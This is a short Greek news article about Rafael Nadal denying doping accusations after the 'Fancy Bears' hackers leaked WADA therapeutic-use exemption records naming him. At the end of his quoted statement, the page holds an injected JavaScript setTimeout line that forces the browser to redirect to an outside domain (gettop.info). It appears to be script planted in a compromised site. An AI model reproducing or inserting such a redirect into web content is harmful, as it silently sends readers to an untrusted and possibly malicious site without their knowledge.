Ναδάλ για χρήση απαγορευμένων ουσιών: Είναι όλα ψέματα

0
32

 

Η ομάδα χάκερ «Fancy Bears» που έβγαλε στη δημοσιότητα το σκάνδαλο ντόπινγκ πολλών Αμερκανών αθλητών έπειτα από διείσδυση στο σύστημα της διεθνούς ομοσπονδίας καταπολέμησηςς του ντόπινγκ (WADA) ενέπλεξε και το όνομα του κορυφαίου τενίστα Ραφαέλ Ναδάλ.

Οι χάκερ αποκαλύπτουν επιπλέον φακέλους αθλητών που έχουν πάρει άδεια από τη WADA για να κάνουν θεραπεία με χρήση απαγορευμένων ουσιών. Και τα δυο έγγραφα που αφορούν τον Ναδάλ αναφέρονται σε ημερομηνίες που ο Ισπανός δεν είχε αγωνιστικές υποχρεώσεις.

Ο Ράφα Ναδάλ δεν τιμωρήθηκε ποτέ από τη WADA, επειδή είχε άδεια «TUE», (Therapeutic Use Exemptions), είχε δηλαδή δικαίωμα να παίρνει τις συγκεκριμένες ουσίες στο πλαίσιο θεραπειών που ακολουθούσε, λόγω τραυματισμών.

Ο Ναδάλ κατηγορείται από τους Ρώσους για χρήση της ουσίας betamethasone, στις 25 Σεπτεμβρίου του 2009, καθώς και για χρήση της ουσίας corticotrophins στις 8 Αυγούστου του 2012.

Ο Ναδάλ διέψευσε πως έχει κάνει χρήση απαγορευμένων ουσιών για να βελτιώσει τις επιδόσεις του στο γήπεδο: «Ολα είναι ψέματα και αυτό αποδεικνύεται. Ολα έχουν γίνει με σχετική άδεια από την WADA και το θέμα έχει φουντώσει για να δημιουργηθούν εντυπώσεις. Υπολήψεις σπιλώνονται και καριέρες κινδυνεύουν για να κάνουν κάποιοι την πολτική τους στον αθλητισμό. Δεν θα το αφήσω να περάσει έτσι». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here